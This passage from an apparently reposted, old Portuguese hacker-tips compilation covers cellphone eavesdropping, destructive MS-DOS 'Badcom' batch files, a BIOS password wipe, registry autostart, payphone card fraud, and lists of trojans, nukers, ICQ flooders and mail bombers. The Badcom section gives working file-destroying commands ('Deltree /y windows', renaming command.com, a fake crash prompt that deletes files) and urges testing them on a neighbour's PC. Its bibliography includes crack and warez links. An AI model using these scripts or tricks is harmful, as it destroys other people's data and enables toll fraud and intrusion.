Tente varias vezes ate encontrar um canal onde haja conversa. Percebeu? Você esta fazendo uma escuta em um telefone celular. Não requer pratica nem tão pouco habilidade. Vale lembrar que se algum policial te pegar você pode ir em cana. Ha também maneiras de se fazer clonagem, isto e, fazer o seu telefone celular usar a linha de outra pessoa. Eu particularmente nunca tentei mas, se você quiser por sua pele a risco, procure pelo Motorola Bible, ou outros tantos textos existentes por ai. Falando de maneira simples, um celular e' um radio - transmissor que trabalha com freqüências na faixa de 800 MHz, e que e' capaz de alternar entre canais ao receber comandos de um computador conhecido como Central Switch, que controla o sistema telefônico móvel. Pode-se dizer que um aparelho celular e' dividido em duas partes: O Transceiver transmissor/Receptor) é a cabeça de comando. Entende-se por cabeça de comando o teclado e seu circuitos de comandos, a NAM e a ESN. A NAM e' um chip de PROM (Programable Read Only Memory) que contem informações sobre o funcionamento do celular, como numero, área, etc. Já a ESN (Eletronic Serial Number) e' um chip de ROM (Read Only Memory) que armazena um numero geralmente de 11 dígitos octais, referentes a um numero de serie único para cada telefone. Existem alguns modelos de celulares que tem as suas NAM's reprogramáveis pelo próprio teclado do celular. Outros necessitam que se ligue o celular a computadores.
12. PEGANDO A FONTE DE H.P. PROTEGIDA
Bem, quem já não se deparou com uma H.P. muito massa e quis pegar o código fonte dela?????
Para pegar o código fonte é simples, o botão direito não funcionará, mas é só clicar no menu EXIBIR e depois em CÓDIGO FONTE (IE), pronto você terá o código fonte da H.P. todinho para fazer o que quiser... mas se a H.P. usa redirecionamento como o CJB, você terá que fazer o passo acima, porém vai aparecer só uma linha, e agora???
Bem, esta linha conterá a URL de origem... digamos a "verdadeira", copie esta URL e acesse o site pela URL que você pegou, então repita o primeiro passo e pronto!!!
Pode não ser de muita utilidade, mas acho que valeu!!!
13. DICAS PARA MS-DOS
13.1 BADCOM'S
Introdução: Badcom's são pequenos arquivos (.COM) que quando executados, eles realizam tarefas em um determinado computador... ou seja, são programas que fazem com que um PC realize comandos quanto do DOS quanto do Windows. Para isto você deve fazer um arquivo de LOTE com os comandos e compila-lo O Mais famoso compilador de arquivos de LOTE (.BAT) é o BAT2EXEC.COM. Comandos Básicos
@ECHO OFF
Comando para não ser mostrados as linhas de comando em uma janela do MS-DOS, Exemplo: Colocando o comando DIR em um Badcom sem o @ECHO OFF no prompt ele mostrará o comando escrito na janela.. C:\DIR Com o comando @ECHO OFF, ele simplesmente elimina os dígitos dos comandos a serem mostrados.
CLS
Comando do MS-DOS, para limpar a tela.
ECHO
Para desativar o comando @ECHO OFF, e mostrar caracteres em uma janela Exemplo: ECHO "Mensagem" Irá mostrar a mensagem na janela, após isso automaticamente retorna a não aparição de comandos na Janela. Criando arquivos com o comando ECHO: Para criar um arquivo com este comando, é necessário o comando , exemplo: ECHO Nomedoarquivo.extensão Irá criar o arquivo no ambiente do MS-DOS... Para criar arquivos com textos ou comandos, é necessário fazer o seguinte comando: ECHO ARQ.EXT "Comando ou mensagem" OBS: As aspas são apenas para indicação porém em comandos não funcionam as aspas. Ex: ECHO Eu.BAT DIR Irá criar um arquivo chamado Eu.BAT (Arquivo de Lote) Com o comando DIR dentro do mesmo.
ATTRIB
Este comando permite que você esconda um determinado arquivo, torne-o somente para leitura, ou torne arquivo do sistema. Para obter os comandos simplesmente digite na janela do MS-DOS: ATTRIB /?
MD
Para Criar diretórios Ex: MD NOMEDODIR
RD
Comando para desfazer diretórios vazios. EX: RD 'NOME DA PASTA VAZIA'
PROGRAMAS !!
Não é um comando.. heheh... é que nos Badcom's são muito útil o uso de programas comuns, como os padrões do Windows 95. Exemplo: O Programa Notepad.exe do Windows 95, para ele ser executado, A partir de um Badcom, você deve colocá-lo na linha de comando.. NOTEPAD.EXE. Para executar o programa a partir de um Badcom... no BAT coloque da seguinte forma:
@echo off
cls
notepad.exe <--- Não é necessário colocar o Path do Windows 95, pois Sendo executado durante o Windows, não acontecerá erros de não achar o programa.. Se quiser abrir textos com o tal programa ! notepad.exe arquivo.txt Você pode fazer isto com outros programas como o Pbrush.exe ( Paint ), Sol.exe ( Paciência ). Desde que estes programas instalados. DEL ou DELETE Para apagar arquivos, no Badcom é usado da seguinte maneira, Para deletar arquivos sem ter problemas de BUG, é necessário fazer com que o comando não tenha a opção (*.*), pois surgirá um prompt de confirmação de exclusão. Digite então da seguinte maneira: DEL *.Extensão, exemplo.. para apagar os arquivos .INI do diretório do Windows: del Drive:\windir\*.ini ou use: drive: cd\ windir del *.ini DELTREE Muitos não tem conhecimento do que este comando pode causar em um sistema, pois é usado da maneira básica... Este "pode ser" o Mais perigoso comando contido em um Badcom. Uso com BUG: DELTREE DIRETORIO Com este comando, aparecerá a confirmação de exclusão do diretório, será muito difícil alguém responder SIM a pergunta não ??? Bem, vou informar o perigo deste comando... Há uma opção no DELTREE que evita a aparição do prompt de confirmação, sendo ela a mais destrutiva, deletando todos os arquivos de um diretório. Bom, para usar o Deltree de forma destrutiva basta acrescentar a opção /Y no mesmo, Exemplo: C:\Deltree /y windows Aparecerá: Excluindo windows... REN Rename é um comando que pode causar dor de cabeça ao usuário atacado.. ex: use o REN em diversos arquivos... REN command.com command.nad REN Autoexec.bat autoexec.non e assim vai... PROMPT Com este comando você pode trocar o C:\> do Ms-dos pelo que você quiser. Por exemplo: C:\>
PROMPT teste:\> teste:\>
GOTO
Este comando faz com que o BAT pule ou volte para determinada parte do Programa. Exemplo: O uso do GOTO é muito usado se quiser que não pare de repetir determinado comando ... usando o comando CLS, veja:
@echo off
:INI <-- Indica a parte do programa onde vai ser voltado o comando Cls Goto INI Usam-se dois ponto antes, outros exemplos são :START :COMEÇO GOTO INI <-- Aqui o comando GOTO, para voltar para o alvo indicado. CHOICE Comando que possibilita um prompt, exemplo: CHOICE /c1234 Para números ou letras é necessário o uso do /c, sem este comando somente CHOICE, mostrará o prompt: [Y,n]? Com o /c e os números irá mostrar: [1,2,3,4]? Este comando precisa de um complemento, leia em: IF e Errorlevel IF e ERRORLEVEL Este é muito usado em Badcom's, ele possibilita o desenvolvimento de questões e prompts para o usuário. exemplo: este comando eu uso muito em pegadinhas e perguntas sacanas, cada vez que o usuário erra a pergunta alguns arquivos são apagados. Seguido também do comando CHOICE Segue a string.... @echo off cls echo Seu sistema paralisou, o que deseja fazer ? echo [1] Reiniciar echo [2] Desligar choice /c12 <-- Mostrará o prompt [1,2]? if errorlevel 2 goto DES à aqui o comando if e errorlevel, sendo if errorlevel 1 goto REI à se o usuário pressionar o 1, ele irá reiniciar o sistema Percebe-se que a posição das strings começa do 2 e depois vai para o 1. Qualquer dúvida nesta parte do badcom fale comigo! Estes são apenas comandos básicos para se aperfeiçoar nos Comandos do MS-dos você pode consultar o próprio HELP do MS-DOS, ele lhe dará varias informações, como no FORMAT e etc.. Com os Badcom’s você pode fazer muitas coisas até, destas que acabei de explicar, como por exemplo, mexer na memória do PC, e criar diretórios de impossível acesso para o Windows 95 ou 3.11. Como compilar um Badcom Para compilar um Badcom ele deve estar nomeado para nomedoarq.BAT Use o programa BAT2EXEC.COM, o mais conhecido compilador BAT. Usando o Bat2exec.com após editar o Badcom em qualquer editor de textos.. (o Mais usado é o EDIT do Ms-dos, pois não ocorrem erros de caracteres no ambiente MS-DOS) use a sintaxe: bat2exec nomedoarq.bat apague o original ou renomei, e execute o nomedoarq.COM para teste.. Claro que Badcom's somente para assustar. Tentem usar os Badcom's de forma inofensiva, evitando assim transtornos futuros.. Ah, não vai testar em seu PC igual eu fiz no meu não.... tive que reinstalar o Windows novamente, hehe ! Teste no vizinho... 13.2 ALTERE A COR NO MS-DOS Para alterar as cores do MS-DOS, você precisará do driver ANSI.SYS carregado no Config.sys do micro. Para isto, edite o Config.sys com EDIT C:\Config.sys e adicione a linha DEVICEHIGH=C:\DOS\ANSI.SYS. Caso você utilize o Windows 95, o comando será DEVICEHIGH=C:\WINDOWS\COMMAND\ANSI.SYS.Após o ANSI.SYS estar carregado em memória, você terá disponível no DOS as seguintes cores: 0 - Preto; 1 - Vermelho; 2 - Verde; 3 - Amarelo; 4 - Azul; 5 - Magenta; 6 - Ciano; 7 - Branco. Para alterar as cores, utilize o comando PROMPT $e[3x;4ym$p$g, onde você deverá substituir "x" pela cor da letra e "y" pela cor de fundo, seguido a numeração de cores apresentada. O comando PROMPT $e[37;44m$p$g, por exemplo, fará com que você tenha o MS-DOS com fundo azul e letras brancas. Para maior comodidade, você poderá adicionar o comando "Prompt" contendo o seu esquema de cores preferido como última linha de seu Autoexec.bat. 13.3 APAGUE A SENHA DA BIOS Para apagar a senha da BIOS, entre no prompt do MS-DOS e digite: Debug -o 70 e2 -o 71 ff -q 13.4 COMO CARREGAR O MICRO DE LIXO 1º- Vá até o dos e crie um arquivo com extensão .bat, Ex.: Edit Lixo.bat 2º-dentro do arquivo digite como seguem as instruções abaixo: @echo off :inicio Cls echo Feito pela Pirataria S/A® , aguarde enquanto carrega... goto end :end Dir c:\ /oe /p /a >> %winbootdir%\Winload32.exe
goto end
14. REGISTRO DO WINDOWS
Apesar de não ser uma dica de programação, este texto ajuda a entender de uma maneira bem simples e rápida as informações que estão armazenadas no Registro do Windows 95.
O Registry do Windows 95 consiste de uma estrutura hierárquica dividida em seis sub-árvores. Você pode usar o programa Regedit.exe para ver uma representação gráfica do Registry.
Muito provavelmente você deve ter uma cópia deste programa no diretório Windows\System do seu computador.
Veja abaixo a descrição de cada uma das seis sub-árvores que compõem o Registry:
· HKEY_CLASSES_ROOT - Este ramo contêm informações sobre as extensões dos arquivos; associações entre arquivos e aplicativos para suportar a funcionalidade de arrastar/soltar (drag and drop); informações sobre os atalhos do Windows 95. As informações deste ramo são atualizadas simultaneamente a partir das atualizações feitas nas informações de HKEY_LOCAL_MACHINE\Software\Classes.
· HKEY_CURRENT_USER - Neste ramo estão as informações relativas ao usuário que está utilizando o computador. Estas informações são originárias ,do ramo HKEY_USERS. Se só existir um único usuário, estas informações são as mesmas nos dois ramos.
· HKEY_LOCAL_MACHINE - O computador e seus componentes de hardware e também os softwares instalados. Múltiplas configurações são possíveis e são atualizadas dinamicamente.
· HKEY_USERS - Informações específicas sobre o desktop, rede e também sobre os usuários são mantidas neste ramo. Estas informações são gravadas no arquivo User.dat
· HKEY_CURRENT_CONFIG - Aqui você encontra informações sobre a configuração do monitor e também das impressoras instaladas no seu computador.
· HKEY_DYN_DATA - Este ramo armazena as informações sobre o desempenho do Windows. Você também vê estas informações clicando sobre o ícone Sistema no Painel de Controle.Como iniciar um programa na inicialização do Windows através do registro?
Para iniciar um programa através do registro, entre em:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run
e adicione uma nova seqüência, em dados, coloque o endereço de seu programa e pronto!
Como posso retirar aquela maldita mensagem que fica no titulo do Internet Explorer, como: "Fornecido por Universo Online" ou "Fornecido por IG - Internet Grátis" através do registro?
Para retirar esta maldita mensagem através do registro, entre em:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main e na seqüência Window Title em dados, mude a mensagem ou a apague e pronto!
15. ORELHÃO
Você tem duas formas de fazer isso:
Truque com o cartão: As técnicas que eu uso são 4 agora você vai conhece-las! Enganando o telefone público Bote o cartão, assim que a pessoa falar ALÔ! segure o numero 9 e retire o cartão, fique segurando o numero 9 até acabar de falar! Grafite O grafite é um material super condutor que conduz energia, e o cartão funciona assim, ele tem uns 50 fusiveiszinhos, cada ligação gasta ele queima um fusível, então o nosso amigo grafite que é condutor de eletricidade, não deixa queimar os fusíveis então faça o seguinte atrás do cartão, (na parte cinza) rabisque-a com força e ,bote no telefone publico e pronto, mas lembre-se rabisque com força! Esmalte de unha incolor O esmalte impede que esses fusíveis queimem, faça também esse com os cartões de vídeo game (divertilandia)! Passe esmalte na parte de traz do cartão, e no de vídeo game passe na parte da fita magnética! Papel Alumínio Pegue o cartão telefônico ZERADO dai bote ele de molho na água sanitária , depois de 3 ou 4 dias a tinta do cartão vai sair, depois pegue papel alumínio e cubra as partes metálicas com o papel alumínio, dai as ligações virarão infinitas!
Ou Quando Teu Cartão Ficar zerado você pega uma parte áspera e raspa a parte de trás deixe até que pareça que ele é ferro dai só por o cartão lá e pronto seu cartão ganhou unidades o Máximo que se consegue é 4 mas se você esta com pressa para ligar via orelhão isso compensa.
16. PROGRAMAS HAKERS
16.1 TROJANS
BACK ORIFICE - UM EXCELENTE INVASOR, PORTANTO COMPLICADO
BACK ORIFICE 2000 - A MAIS NOVA VERSÃO DO BACK ORIFICE
NETBUS 1.7 - UM FAMOSO TROJAN
NETBUS 1.7(PORTUGUÊS) - VERSÃO TRADUZIDA EM PORTUGUÊS
NETBUS 2.06 - A VERSÃO MAIS NOVA E DE FÁCIL USO
WINCRASH 1.03 - O MELHOR TROJAN NA MINHA OPINIÃO
WINCRASH 2000 - VERSÃO MAIS NOVA
SUBSEVEN 2.0 - EXCELENTE TROJAN
SUBSEVEN 2.2 BETA - VERSÃO MAIS NOVA
DEEP THROAT 3.0 - MUITO BOM, VERSÃO MAIS NOVA
GIRL FRIEND 1.35 - MOSTRA AS INFORMAÇÕES DO COMPUTADOR DA VÍTIMA
ELITE105 - PROGRAMA DA ELITE HACKER...
CHANNEL - PLUG-IN DO BACK ORIFICE
16.2 RASTREADORES
XITAMI - O FAMOSO PROGRAMA PARA PEGAR IP EM CHATS
PORT SCAN - PROGRAMA QUE MOSTRA PORTAS ABERTAS DE UM DETERMINADO IP
IP SCAN - COLOQUE O IP E ELE TE DA A PROVEDORA
IP TRACER - RASTREIE O IP DA PESSOA QUE ESTÁ NO CHAT WWW
TROJANHAUTER - PROGRAMA QUE RASTREIA IPS INFECTADOS POR TROJANS
16.3 FERRAMENTAS PARA O NETBUS
NETBUS HACK 1.10 - PASSE POR CIMA DAS SENHAS PARA NETBUS
NUT BUS - DETONE A SENHA DO NETBUS
BUS DRIVER - SCANEIA IP'S INFECTADOS PELO PATCH
NETBUSTER 1.20(PORTUGUÊS) - SIMULADOR DE INVASÃO
BUS CONQUERER 1.30 - EXCELENTE FERRAMENTA
GABANBUS - VÁRIAS FERRAMENTAS EM UM SÓ PROGRAMA
RIP - SCANEIA IP"S INFECTADOS(MIRC)
NETBUS NUKER - NUKE
NETBUSTER KILLER - PASSE POR CIMA DAS PROTEÇÕES PARA NETBUS
CRACKER NET BUS 2.06 - CRACKER PARA NETBUS
16.4 FERRAMENTAS PARA ICQ
ICQ CRACK - NÃO PRECISA DE AUTORIZAÇÃO PARA ADICIONAR A LISTA
ICQ FLOOD 95 - FLOOD PRA ICQ
ICQ KILLER - DETONE O ICQ DE SEUS AMIGOS
ICQ SNIFER - DIGITE O UIN DA PESSOA E DESCUBRA O IP
X ICQ - VÁRIOS PROGRAMAS HACKERS EM UM SÓ
IFQ - EXCELENTE FERRAMENTA
ICQ ZAP - FLOOP DE ICQ PARA DOS
ICQ BOOM - MANDE MUITAS MENSAGENS PARA O CARA
16.5 E-MAILS
ALANCHE - PROGRAMA PADRÃO DE E-MAIL BOMBA
ANONYMAIL - PROGRAMA PADRÃO DE E-MAIL ANÔNIMO
KABOOM - PROGRAMA PADRÃO DE E-MAIL ANÔNIMO
UNABOMB - PROGRAMAS PADRÃO DE E-MAIL BOMBA
16.6 DESENCRIPTADORES
CRACKER JACK - DESENCRIPTADOR DE SENHAS
XITAMI - DESCUBRA IP'S DAS PESSOAS QUE ESTÃO NAS SALAS DE CHATS
PWL TOOL - MOSTRA TODAS AS SENHAS DO PC
REVELATION - DESENCRIPTADOR DE SENHAS
IP SCAN - RASTREADOR DE IP
IP TRACER - DESCUBRA IP'S EM SALAS DE CHATS
16.7 NUKE
AGRESSOR - MELHOR PROGRAMA DE NUKE MAIS MUITO COMPLICADO
PNUKEX - ESTE PROGRAMA DE NUKE É MUITO BOM DA ATÉ PARA ESCOLHER A PORTA
WNUKE - BOM PROGRAMA DE NUKE
WIN NUKE 32 - ÓTIMO NUKE
CLICK 2.2 - O MAIS FAMOSO NUKE DERRUBA TANTO PROVEDORES QUANTO CLIENTES
ELITE BEM - PARECIDO COM O AGRESSOR SÓ QUE COM MAIS FUNÇÕES
17. FRASES ENCONTRADAS NA INTERNET
"O Windows não é ruim, só não foi terminado"
Browser para DOS? http://www.io.com/
Netscape em Português?www.netscape.com/pt
"Sogra.exe, se você tem este arquivo delete-o, não serve para nada e só ocupa espaço"
"Se Bill Gates é Divino, o Windows é o Apocalipse"
"O UNIX foi feitos por programadores, para programadores, portanto PROGRAME!!!"
"Pode parecer brincadeira, mas foi encontrada uma máquina rodando LINUX em baixo do domínio WWW.MICROSOFT.COM, dá para acreditar???"
“A diferença de quem usa um sistema operacional para quem usa o Windows é simples: um usuário de Windows só tem dor de cabeça com os problemas do sistema e perde todo seu tempo tentando fazer ele funcionar, enquanto um usuário de um sistema operacional tipo Linux ou Unix, faz seu trabalho e não esquenta tanto a cabeça com problemas do sistema porque ele sabe que são mínimos.”
18. BIBLIOGRAFIA
http://www.crackstore.de/cracks/SR-WORM2.ZIP
http://www.bol.com.br/
www.microsoft.com.br/suporte
http://www.bol.com.br/
www.uol.com.br/infoexame
http://www.hakershomepages.com/
http://www.warez.com/
http://www.metaminer.com.br/
http://www.yahho.com/
www.mirosoft.com/windowsupdate
http://www.hackerbra.cjb/.net
www.hackersfile.hpg.ig.com.br/index.html
http://www.bol.com.br/
www.microsoft.com.br/suporte
http://www.bol.com.br/
www.uol.com.br/infoexame
http://www.hakershomepages.com/
http://www.warez.com/
http://www.metaminer.com.br/
http://www.yahho.com/
www.mirosoft.com/windowsupdate
http://www.hackerbra.cjb/.net
www.hackersfile.hpg.ig.com.br/index.html
Comentários
Postar um comentário